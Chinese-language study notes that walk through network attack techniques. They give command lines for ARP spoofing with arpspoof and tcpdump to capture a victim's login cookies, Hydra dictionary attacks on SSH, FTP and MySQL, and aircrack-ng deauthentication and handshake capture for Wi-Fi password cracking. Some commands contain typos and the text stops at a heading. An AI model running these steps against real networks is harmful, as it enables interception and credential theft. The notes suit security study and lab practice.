应用层:【HTTP协议、FTP协议、SMTP协议】 [报文]
运输层:【TCP协议 [报文段]、UDP协议 [用户数据报]】
网络层:【IP协议(配套使用ARP、ICMP\IGMP)】[IP数据报]
数据链路层:【MAC层】[帧]
物理层: [bit]
ARP (地址解析协议)
局域网中,网络传输的是“帧”,帧里有目标主机的MAC地址。同一个局域网中一个主机要和另一个主机通信,必须知道目标主机的MAC地址,
ARP的功能就是 在主机发送数据帧前将目标IP地址转换成MAC地址。
CMD: ARP -A 当前电脑所缓存的mac地址和ip地址对应表
通信步骤:pc1在本地ARP缓存如果没有找到pc2的映射,就将ARP请求帧广播到本地网络上,pc2收到后回复MAC信息给pc1。
arp欺骗步骤:
1.欺骗目标主机和网关:arpspoof -i 网卡 -t IP1 IP2【告诉ip1我是ip2】
arpspoof -i eth0 -t 192.168.106 192.168.1.1
arpspoof -i eth0 -t 192.168.1.1 192.168.106
2.打开路由转发功能:linux因为系统安全考虑是不支持IP转发的,其配置文件写在/proc/sys/net/ipv4/ip_forward中。默认为0
临时打开: echo 1>/proc/sys/net/ipv4/ip_forword
永久打开: 编辑配置文件/etc/sysctl.conf net.ipv4.ip_forward=1
3.抓包
用tcpdump抓包:tcpdump -i 网卡 -Av -c 200 dst 指定网站ip地址
4.目标主机去访问指定的网站
5.抓到目标主机登陆网站的cookies
DNS(域名系统)
域名与IP地址对应。域名解析(或主机名解析)映射保存在hosts文件
CMD命令: nslookup
dns劫持:开放免费wifi,劫持dns去自设的代理服务器,获得访问权限
Nmap工具
1.主机发现
原理与ping类似,发送探测包到目标主机,收到回复说明主机是开启的。
【根据不同的情况发送不同的探测包,绕过防火墙】 例:arp报文、icmp报文、tcp三次握手SYN/ACK、udp、SCTP协议
常用命令:-sn(用ping只进行主机发现过程);-Pn(已确定主机存在直接进行端口扫描);traceroute(跟踪路由);
2.端口扫描
3.服务版本
4.系统探测
口令爆破
Hysra工具
参数详解
-l LOGIN:指定用户名
-L FILE:指定用户名字典
-p PASS小写:指定密码
-P FILE大写:指定密码字典
-M FILE:指定IP列表
-o FILE:指定结果输出文件
-V 显示详细过程
例:hysra -L 路径/user.txt【用户名字典】 -P 路径/password.txt【密码字典】 192.168.1.1【ip地址】 -V mysql/SSH/FTP【破解服务】
SSH服务爆破
FTP服务
无线安全
一般笔记本自带无线网卡无法做实验,linux中iwconfig命令查看网卡
通信步骤:
STA > AP
--> STA向所有信道发出probe requse探帧发现AP
<-- AP回应probe response响应帧
--> authentication。STA向AP发出认证请求
<--> 认证过程
<-- AP响应认证结果
--> associations。STA发出关联请求
<-- AP响应关联
关联成功,开始通信
无线口令爆破
linux下 aircrack-ng工具
1.加载好本机无线网卡
2.关闭会产生影响的进程
关闭网络:service network -manager stop
结束进程:airmon-ng check kill
查看周围网络信息:airodump-ng 无线网卡名
抓包:airodump -w 保存文件名 -c 频道 网卡名
airodump -w 保存文件名 -c 频道 --bssid AP的BSSID 网卡名
为了加速握手包的获取,可以使用aireplay来给AP发送断开包:aireplay-ng -0 发送次数 -a AP的mac地址 [-c STA的mac地址] 网卡名
字典破解: